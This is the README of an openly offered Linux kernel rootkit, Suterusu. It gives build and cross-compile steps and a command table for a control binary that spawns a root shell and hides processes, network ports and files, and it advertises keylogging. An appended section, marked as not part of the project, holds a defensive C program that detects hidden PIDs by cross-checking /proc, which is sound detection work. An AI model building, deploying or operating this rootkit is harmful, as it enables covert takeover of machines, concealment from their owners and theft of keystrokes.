Suterusu
Fork from http://redmine.poppopret.org/projects/suterusu. An LKM rootkit targeting Linux 2.6/3.x on x86 and ARM. Supports privilege escalation, process hiding, connection hiding (TCP/UDP v4/v6), file/directory hiding, keylogging, and screen unlocking. Under active development.
Typical compilation steps:
$ wget http://kernel.org/linux-x.x.x.tar.gz
$ tar xvf linux-x.x.x.tar.gz
$ cd linux-x.x.x
$ make menuconfig
$ make modules_prepare
$ cd /path/to/suterusu
$ make linux-x86 KDIR=/path/to/kernel
To compile against the currently running kernel (kernel headers installed):
$ make linux-x86 KDIR=/lib/modules/$(uname -r)/build
If a specific toolchain is desired for cross-compilation, provide the CROSS_COMPILE variable during make:
$ make android-arm CROSS_COMPILE=arm-linux-androideabi- KDIR=/path/to/kernel
To compile the command binary:
$ gcc sock.c -o sock
Commands
Root shell: $ ./sock 0
Hide PID: $ ./sock 1 [pid]
Unhide PID: $ ./sock 2 [pid]
Hide TCPv4 port: $ ./sock 3 [port]
Unhide TCPv4 port: $ ./sock 4 [port]
Hide TCPv6 port: $ ./sock 5 [port]
Unhide TCPv6 port: $ ./sock 6 [port]
Hide UDPv4 port: $ ./sock 7 [port]
Unhide UDPv4 port: $ ./sock 8 [port]
Hide UDPv6 port: $ ./sock 9 [port]
Unhide UDPv6 port: $ ./sock 10 [port]
Hide file/directory: $ ./sock 11 [name]
Unhide file/directory: $ ./sock 12 [name]
Note: At the moment, file/directory hiding only hides names in the / directory.
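A defender-side check for the "Hide PID" command above, added here as an example and not part of Suterusu: it compares the PIDs returned by listing /proc with the PIDs that answer a null signal, and reports any that exist but are not listed. It assumes the hiding works by filtering the /proc directory listing, which this README does not state; the function names and the MAX_PID bound are this example's own.

```c
#define _POSIX_C_SOURCE 200809L
#include <dirent.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#define MAX_PID 4194304  /* assumption: largest kernel.pid_max on 64-bit Linux */
/* View 1: mark every numeric entry returned by listing /proc. */
static int list_proc(unsigned char *seen) {
    DIR *d = opendir("/proc");
    struct dirent *e;
    if (!d) return -1;
    while ((e = readdir(d)) != NULL) {
        char *end;
        long pid = strtol(e->d_name, &end, 10);
        if (*end == '\0' && pid > 0 && pid < MAX_PID) seen[pid] = 1;
    }
    return closedir(d);
}
/* View 2: null signal; EPERM still proves the PID exists. */
static int alive(int pid) { return kill(pid, 0) == 0 || errno == EPERM; }
/* Thread IDs can answer probes but are never listed; keep group leaders only. */
static int is_leader(int pid) {
    char path[64], line[128];
    int tgid = pid;
    snprintf(path, sizeof path, "/proc/%d/status", pid);
    FILE *f = fopen(path, "r");
    if (!f) return 1;  /* unreadable status: keep the PID as a candidate */
    while (fgets(line, sizeof line, f) && sscanf(line, "Tgid: %d", &tgid) != 1) continue;
    fclose(f);
    return tgid == pid;
}
/* PIDs that exist (probed twice to skip exits mid-scan) but were not listed. */
int cross_view(const unsigned char *seen, int max_pid, int (*exists)(int),
               int (*leader)(int), int *out, int cap) {
    int n = 0;
    for (int pid = 1; pid < max_pid && n < cap; pid++)
        if (!seen[pid] && exists(pid) && leader(pid) && exists(pid)) out[n++] = pid;
    return n;
}
int main(void) {
    static unsigned char seen[MAX_PID], again[MAX_PID];
    int cand[256];
    if (list_proc(seen) < 0) { perror("/proc"); return 2; }
    int n = cross_view(seen, MAX_PID, alive, is_leader, cand, 256);
    list_proc(again);  /* second listing drops processes started mid-scan */
    for (int i = 0; i < n; i++)
        if (!again[cand[i]] && alive(cand[i])) printf("unlisted PID %d\n", cand[i]);
    return 0;
}
```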
